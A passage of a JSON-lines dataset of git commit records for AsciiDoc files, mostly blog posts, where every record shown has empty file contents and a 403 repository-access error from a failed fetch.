<1d6e1cf70ec6f9ab28d3ea4b27a49a77654d370e@shoss.de>","repos":"sebhoss\/generic-types","old_file":"CONTRIBUTING.asciidoc","new_file":"CONTRIBUTING.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebhoss\/generic-types.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"79711bcbfcab8214618aa9ccf71c836e646b5fba","subject":"Update 2015-11-08-Hubpress-Create-a-Post.adoc","message":"Update 2015-11-08-Hubpress-Create-a-Post.adoc","repos":"AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io","old_file":"_posts\/2015-11-08-Hubpress-Create-a-Post.adoc","new_file":"_posts\/2015-11-08-Hubpress-Create-a-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AppHat\/AppHat.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb483231e4f7eec70d91eb297d85074b9031eda7","subject":"Update 2019-01-31-essential-Java-classes.adoc","message":"Update 2019-01-31-essential-Java-classes.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-essential-Java-classes.adoc","new_file":"_posts\/2019-01-31-essential-Java-classes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07901a35c39f17bf4293cc39a52d4beb236beced","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c55a8d6b82ca838a6ff0e9835158d09426e40de","subject":"Update 2016-11-07-092800-Monday-Morning.adoc","message":"Update 2016-11-07-092800-Monday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-092800-Monday-Morning.adoc","new_file":"_posts\/2016-11-07-092800-Monday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a651a442a738903641a9b2e74829cd70baec487c","subject":"Update 2017-07-13-Como-pensar-em-Prolog.adoc","message":"Update 2017-07-13-Como-pensar-em-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-07-13-Como-pensar-em-Prolog.adoc","new_file":"_posts\/2017-07-13-Como-pensar-em-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d431addb0b1b68dc422c6decfb0a55437a2ef2f9","subject":"y2b create post The Newest Member Of Unbox Therapy...","message":"y2b create post The Newest Member Of Unbox Therapy...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-05-The-Newest-Member-Of-Unbox-Therapy.adoc","new_file":"_posts\/2017-07-05-The-Newest-Member-Of-Unbox-Therapy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ea596a15b096b981b5518b31bf6bcc963a5b549","subject":"Create index.adoc","message":"Create index.adoc","repos":"camunda\/camunda-bpm-spring-boot-starter,camunda\/camunda-spring-boot-starter,camunda\/camunda-spring-boot-starter","old_file":"docs\/src\/main\/asciidoc\/changelog\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/changelog\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camunda\/camunda-spring-boot-starter.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4616d4d0c0a02060f1f3d2cd0d84036d95272914","subject":"Publish 2017-02-25adoc.adoc","message":"Publish 2017-02-25adoc.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"2017-02-25adoc.adoc","new_file":"2017-02-25adoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b65abb8520b2f262b1894f97c8db38c9206f374a","subject":"y2b create post Behold LG's Gigantic 4K TV for $20,000 - CES 2013","message":"y2b create post Behold LG's Gigantic 4K TV for $20,000 - CES 2013","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-07-Behold-LGs-Gigantic-4K-TV-for-20000--CES-2013.adoc","new_file":"_posts\/2013-01-07-Behold-LGs-Gigantic-4K-TV-for-20000--CES-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13e3a6f3c4e13d742af0e0eab76387d8df83c838","subject":"Add common snippet to start the application","message":"Add common snippet to start the application\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-startTheApplication.adoc","new_file":"src\/main\/docs\/common-startTheApplication.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"136289a0c2e4a14d2131f33f82a12348d454ef4e","subject":"Added testing instructions","message":"Added testing instructions\n","repos":"degyves\/VimPyServer","old_file":"test\/TESTING.asciidoc","new_file":"test\/TESTING.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/degyves\/VimPyServer.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"cbdff427542a763039d3a96d120a0a6ce8e5f293","subject":"Publish 2016-12-2-3-Dpen.adoc","message":"Publish 2016-12-2-3-Dpen.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-2-3-Dpen.adoc","new_file":"2016-12-2-3-Dpen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecbaf0624eb6d3b681368bf45f863366f9868cb2","subject":"Publish 19-02-2015-Python-para-Principiantes.adoc","message":"Publish 19-02-2015-Python-para-Principiantes.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"19-02-2015-Python-para-Principiantes.adoc","new_file":"19-02-2015-Python-para-Principiantes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46b3e4bd925529e4e9008ccd9d5a6815e911de61","subject":"Publish 2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","message":"Publish 2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","new_file":"2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecac8c2028b02b12b5934201833bc79a3f4186df","subject":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","message":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a501727b22a5ff336e5ab4fef5f892cb8fa0deb","subject":"Update 2017-06-02-Azure-4.adoc","message":"Update 2017-06-02-Azure-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-02-Azure-4.adoc","new_file":"_posts\/2017-06-02-Azure-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a17ecccc877ee96475f179b87c2afc95e7cb0a0","subject":"Update 
2019-01-19-Vuejs-4.adoc","message":"Update 2019-01-19-Vuejs-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4fd248ed5ec19f0680a352ccddbc274ec426ae93","subject":"Update 2018-02-27-When-the-RTFM-sucks.adoc","message":"Update 2018-02-27-When-the-RTFM-sucks.adoc","repos":"costalfy\/costalfy.github.io,costalfy\/costalfy.github.io,costalfy\/costalfy.github.io,costalfy\/costalfy.github.io","old_file":"_posts\/2018-02-27-When-the-RTFM-sucks.adoc","new_file":"_posts\/2018-02-27-When-the-RTFM-sucks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/costalfy\/costalfy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e051dc1dcfbf5b741ae06f0c73d22659557bbb60","subject":"Update 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","message":"Update 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_file":"_posts\/2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0dbd032f43f36eaf03b18dbda5a4770129af4d4a","subject":"Update 2015-04-15-Quest-ce-que-lAPM.adoc","message":"Update 2015-04-15-Quest-ce-que-lAPM.adoc","repos":"yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io","old_file":"_posts\/2015-04-15-Quest-ce-que-lAPM.adoc","new_file":"_posts\/2015-04-15-Quest-ce-que-lAPM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yoanndupuy\/yoanndupuy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1de60eeebc4a43ee0c5195a3979cde8347e0fb50","subject":"Update 2015-09-14-.adoc","message":"Update 2015-09-14-.adoc","repos":"whelamc\/life,whelamc\/life,whelamc\/life","old_file":"_posts\/2015-09-14-.adoc","new_file":"_posts\/2015-09-14-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/whelamc\/life.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1830461cfcc6790e691d004bac0bcd880656bdc1","subject":"Update 2018-02-02-.adoc","message":"Update 2018-02-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-02-.adoc","new_file":"_posts\/2018-02-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"014f917a0b7d7e94de461126f0d754c707ed8fa4","subject":"Update 2016-03-30-Analisis-Paquetes.adoc","message":"Update 2016-03-30-Analisis-Paquetes.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af7e86efabca2e84a4dfc671c28edb502663fd0f","subject":"Update 2016-06-22-First-from-London.adoc","message":"Update 2016-06-22-First-from-London.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-06-22-First-from-London.adoc","new_file":"_posts\/2016-06-22-First-from-London.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"096a1ab179508771332c130ff71993a205f8f83e","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae6b44348a9954c428edf811a06c8f6e3ab7e939","subject":"Add NOTES.adoc","message":"Add NOTES.adoc\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8189f2c40ad3523ebcae6ce6996e5b6b43640786","subject":"Update 2015-07-22-Hoge.adoc","message":"Update 2015-07-22-Hoge.adoc","repos":"fr-developer\/fr-developer.github.io,fr-developer\/fr-developer.github.io,fr-developer\/fr-developer.github.io","old_file":"_posts\/2015-07-22-Hoge.adoc","new_file":"_posts\/2015-07-22-Hoge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fr-developer\/fr-developer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66a5caf3c87e221280ea8555ca7261d0dccf87dc","subject":"Update 2016-04-10-fuckyou.adoc","message":"Update 2016-04-10-fuckyou.adoc","repos":"dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io","old_file":"_posts\/2016-04-10-fuckyou.adoc","new_file":"_posts\/2016-04-10-fuckyou.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/dingboopt\/dingboopt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef101b20cc3c53d0df43ea1ad0bc1eaf9a7a7242","subject":"Update 2016-12-04-Physics.adoc","message":"Update 2016-12-04-Physics.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-12-04-Physics.adoc","new_file":"_posts\/2016-12-04-Physics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0800991cdcc1995c7c21ec1a06122f5259fe8191","subject":"NEWS: Version 0.1.0","message":"NEWS: Version 0.1.0\n","repos":"josh-berry\/homectl,josh-berry\/homectl","old_file":"NEWS.asciidoc","new_file":"NEWS.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/josh-berry\/homectl.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ac610a313d4162b32bfc9553ce20395e7e0c536","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95414e03abd576f7a2d3ec334c8d9ce764644b39","subject":"Tip default profile","message":"Tip default profile\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-tipDefaultProfile.adoc","new_file":"src\/main\/docs\/common-tipDefaultProfile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e3725e7455c4ba79adc57f279194905da0e1d3f0","subject":"Delete the file at '2017-02-25adocadoc-part-1.adoc'","message":"Delete the file at '2017-02-25adocadoc-part-1.adoc'","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"2017-02-25adocadoc-part-1.adoc","new_file":"2017-02-25adocadoc-part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23f05726e6465bde210c7bb52a6ebd5153cab5f4","subject":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","message":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"a8c643e833d4e6064726b8747f63282a09594bc6","subject":"[Docs] Fix a typo in Create Index naming limitation (#30891)","message":"[Docs] Fix a typo in Create Index naming limitation (#30891)\n\n","repos":"nknize\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/reference\/indices\/create-index.asciidoc","new_file":"docs\/reference\/indices\/create-index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9b4f2570cabe6b4bfd3469d95982590d783d589d","subject":"Update Asciidoctor.adoc","message":"Update Asciidoctor.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Asciidoctor.adoc","new_file":"Linux\/Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31fd831914460a79588020152ff360b58de8820e","subject":"Update Asciidoctor.adoc","message":"Update Asciidoctor.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Asciidoctor.adoc","new_file":"Linux\/Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56d1a78ef52fc6774ba74194c6d9f293c45c4090","subject":"Update 2016-11-16-Setting-up-Angular2-CLI-with-Maven-in-enterprise-network-2.adoc","message":"Update 2016-11-16-Setting-up-Angular2-CLI-with-Maven-in-enterprise-network-2.adoc","repos":"pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/hubpress,pdudits\/hubpress,pdudits\/hubpress,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/hubpress","old_file":"_posts\/2016-11-16-Setting-up-Angular2-CLI-with-Maven-in-enterprise-network-2.adoc","new_file":"_posts\/2016-11-16-Setting-up-Angular2-CLI-with-Maven-in-enterprise-network-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"8b7e62c3305e4d5de8d1f60908b45efb661433b0","subject":"Update 2015-08-11-Propuesta-de-Reestructuracion-de-repositorios-de-Bachaco-ve.adoc","message":"Update 2015-08-11-Propuesta-de-Reestructuracion-de-repositorios-de-Bachaco-ve.adoc","repos":"Bachaco-ve\/bachaco-ve.github.io,Bachaco-ve\/bachaco-ve.github.io,Bachaco-ve\/bachaco-ve.github.io","old_file":"_posts\/2015-08-11-Propuesta-de-Reestructuracion-de-repositorios-de-Bachaco-ve.adoc","new_file":"_posts\/2015-08-11-Propuesta-de-Reestructuracion-de-repositorios-de-Bachaco-ve.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bachaco-ve\/bachaco-ve.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d23937f833f6406d25a1a180bd99bc5e13064000","subject":"Update 2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","message":"Update 2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","new_file":"_posts\/2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1aa577bcc3d135113ea3742459cbe09b748e3e5","subject":"Update 2017-10-18-Blog-Title.adoc","message":"Update 2017-10-18-Blog-Title.adoc","repos":"chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io","old_file":"_posts\/2017-10-18-Blog-Title.adoc","new_file":"_posts\/2017-10-18-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chrizco\/chrizco.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3bebcdbf9c0e4b623a88b2ba87b479f15134e8b","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd5f08b5ff5a732c9f63799e2ccda0c57ab43a0e","subject":"Update 2016-01-27-test2.adoc","message":"Update 2016-01-27-test2.adoc","repos":"inedit-reporter\/inedit-reporter.github.io,inedit-reporter\/inedit-reporter.github.io,inedit-reporter\/inedit-reporter.github.io","old_file":"_posts\/2016-01-27-test2.adoc","new_file":"_posts\/2016-01-27-test2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/inedit-reporter\/inedit-reporter.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6dced81fde7db9f0e93d6217300aa65ecfcfa1a","subject":"Update 2017-05-03-Intro.adoc","message":"Update 
2017-05-03-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7be8cfda5930ec2f4c828dde89b46f9d8692de52","subject":"Update 2017-08-04-mecab.adoc","message":"Update 2017-08-04-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-04-mecab.adoc","new_file":"_posts\/2017-08-04-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 